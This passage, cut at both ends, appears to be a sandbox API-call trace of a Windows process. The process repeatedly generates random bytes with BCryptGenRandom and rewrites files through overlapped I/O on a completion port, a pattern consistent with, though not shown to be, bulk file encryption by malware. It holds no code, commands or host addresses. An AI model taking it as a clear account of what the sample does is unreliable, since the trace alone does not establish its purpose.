lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.804] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.804] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.804] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0113.804] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.805] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.805] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0113.805] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.805] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.805] free (_Block=0x77d7a8) [0113.805] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.805] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.806] free (_Block=0x2071c20) [0113.806] free (_Block=0x2071d30) [0113.806] free (_Block=0x77d8b0) [0113.806] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.806] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.808] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x12f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.808] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.825] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x45ba, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.826] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.826] CloseHandle (hObject=0x2f4) returned 1 [0113.832] free (_Block=0x1ff1e60) [0113.832] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.867] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.867] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0113.867] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.868] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0113.868] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.868] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.868] free (_Block=0x77d7a8) [0113.868] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.868] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.869] free (_Block=0x2071c20) [0113.869] free (_Block=0x2071d30) [0113.869] free (_Block=0x77d8b0) [0113.869] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.869] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.882] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.882] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0113.882] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.883] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0113.883] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.883] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.883] free (_Block=0x77d7a8) [0113.883] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.883] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.883] free (_Block=0x2071c20) [0113.883] free (_Block=0x2071d30) [0113.883] free (_Block=0x77d8b0) [0113.883] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0113.884] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.905] CloseHandle (hObject=0x2f4) returned 1 [0113.910] free (_Block=0x1ff1e60) [0113.910] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.925] ReadFile (in: hFile=0x13c0, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x721c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0113.940] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.962] WriteFile (in: hFile=0x81c, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x3780, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0113.962] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.973] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x9210, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.973] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.988] WriteFile (in: hFile=0x340, lpBuffer=0x3db04f4, nNumberOfBytesToWrite=0x3df0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 0x0 [0113.988] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0114.003] ReadFile (in: hFile=0x81c, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xb6de, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0114.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0114.154] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x2b00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0114.154] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0114.171] WriteFile (in: hFile=0x2f4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0114.171] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0114.184] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.185] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0114.185] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.185] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.185] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0114.185] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0114.186] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0114.186] free (_Block=0x77d7a8) [0114.186] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0114.186] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0114.186] free (_Block=0x2071c20) [0114.186] free (_Block=0x2071d30) [0114.186] free (_Block=0x77d8b0) [0114.186] WriteFile (in: hFile=0x340, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0114.186] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0114.197] CloseHandle (hObject=0x13c0) returned 1 [0114.208] free (_Block=0x3d70450) [0114.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0114.226] ReadFile (in: hFile=0x3bc, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x13ea, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 0x0 [0114.290] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0114.294] WriteFile (in: hFile=0x2f4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x22e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0114.394] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0114.472] CloseHandle (hObject=0x2f4) returned 1 [0114.483] free (_Block=0x3db04c0) [0114.483] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0114.490] CloseHandle (hObject=0x13c0) returned 1 [0114.492] free (_Block=0x3d70450) [0114.492] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0114.500] CloseHandle (hObject=0x3bc) returned 1 [0114.508] free (_Block=0x1ff1e60) [0114.508] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0114.519] ReadFile (in: hFile=0x2f4, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x2332, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 0x0 [0114.538] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.108] CloseHandle (hObject=0x340) returned 1 [0117.109] free (_Block=0x3e70008) [0117.109] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.128] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.129] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0117.129] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.129] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0117.133] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.133] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.133] free (_Block=0x77d7a8) [0117.133] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.133] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.133] free (_Block=0x2071c20) [0117.133] free (_Block=0x2071d30) [0117.133] free (_Block=0x77d8b0) [0117.133] WriteFile (in: hFile=0x2f4, lpBuffer=0x3db04f4*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 1 [0117.134] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.138] CloseHandle (hObject=0x3bc) returned 1 [0117.140] free (_Block=0x3ef0008) [0117.140] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.146] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.146] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0117.147] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.147] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0117.147] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.147] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.147] free (_Block=0x77d7a8) [0117.147] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.147] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.148] free (_Block=0x2071c20) [0117.148] free (_Block=0x2071d30) [0117.148] free (_Block=0x77d8b0) [0117.148] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0117.148] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.158] CloseHandle (hObject=0x2f4) returned 1 [0117.159] free (_Block=0x3db04c0) [0117.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.164] CloseHandle (hObject=0x340) returned 1 [0117.172] free (_Block=0x3d70450) [0117.172] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.172] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0117.173] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.714] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.714] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.724] WriteFile (in: hFile=0x13c0, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0117.725] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.740] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0117.740] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.760] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xe4e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0117.760] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.771] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xbc8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.771] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.781] ReadFile (in: hFile=0x13c0, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x5f8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0117.781] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.793] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.793] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0117.793] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.794] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.794] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0117.794] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.794] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.794] free (_Block=0x77d7a8) [0117.794] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.794] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.795] free (_Block=0x2071c20) [0117.795] free (_Block=0x2071d30) [0117.795] free (_Block=0x77d8b0) [0117.795] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0117.795] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.846] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x34e2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0117.850] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0117.851] CloseHandle (hObject=0x340) returned 1 [0117.852] free (_Block=0x3d70450) [0117.852] 